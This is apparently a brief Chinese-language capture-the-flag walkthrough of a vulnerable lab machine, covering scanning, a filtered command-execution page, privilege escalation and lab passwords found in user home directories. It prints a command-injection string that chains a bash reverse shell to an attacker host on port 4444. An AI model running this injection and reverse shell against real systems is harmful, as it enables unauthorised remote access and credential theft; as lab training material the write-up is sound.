主机发现
目录端口扫描
查看robots文件
/dev_shell.php 接口可以执行命令,但会过滤某些命令,用命令拼接符拼接其他命令
whoami | pwd&echo "bash -i >& /dev/tcp/192.168.132.128/4444 0>&1" | bash kali监听4444
进行提权,bob的家目录下有一个密码文件和一个secret目录
得到两个用户的账号密码,还有一个加密文件
/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下有发现密钥,藏头诗 HARPOCRATES
读取加密文件,发现权限不够,ssh连接jc用户
读取到bob的密码
elliot 的家目录,发现一个 theadminisdumb.txt 文件 ,密码被改为theadminisdumb
ssh连接bob,b0bcat_
sudo su 提权,密码theadminisdumb